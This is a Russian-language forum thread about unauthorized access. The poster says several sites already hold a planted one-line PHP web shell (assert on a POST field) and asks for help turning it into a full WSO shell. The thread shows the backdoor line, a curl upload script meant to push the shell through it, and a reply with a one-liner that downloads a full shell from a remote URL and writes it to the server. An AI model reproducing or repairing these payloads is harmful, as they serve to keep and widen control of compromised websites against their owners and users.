Вопрос по php

Всех приветствую.
Необходима помощь в заливке шелла через мини-шелл.

Дано: несколько сайтов с залитым мини шеллом вида <?php assert($_POST["xxx"]); ?>

Проверка через HackBar Mozilla показала что phpinfo() выполняется.

allow_url_fopen On
allow_url_include Off

Не могу сказать что хорошо знаю php, скорее в процессе изучения.
Решил попробовать написать скрипт заливки полноценного шелла, но видно где то косячу, скрипт не заливает шелл.

PHP:

<?php
$file="wso.php";
$ch = curl_init("http://site.com/minishell.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch,CURLOPT_POSTFIELDS,"xxx=$xxx");
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('file_field'=>"@$file"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch); curl_close($ch);
echo "$postResult";
?>

Прошу подсказать где допустил ошибку, возможно подправить код.
Не очень понимаю где я должен в коду разместить переменную "xxx", для отработки минишелла.

Спасибо заранее.

 

Code:

file_put_contents('shell.php', file_get_contents('http://site.com/full_shell.txt'));

Где:
shell.php - название файла куда записывать шелл
http://site.com/full_shell.txt - ссылка, откуда качать шелл (исходник, не интерпретируемый).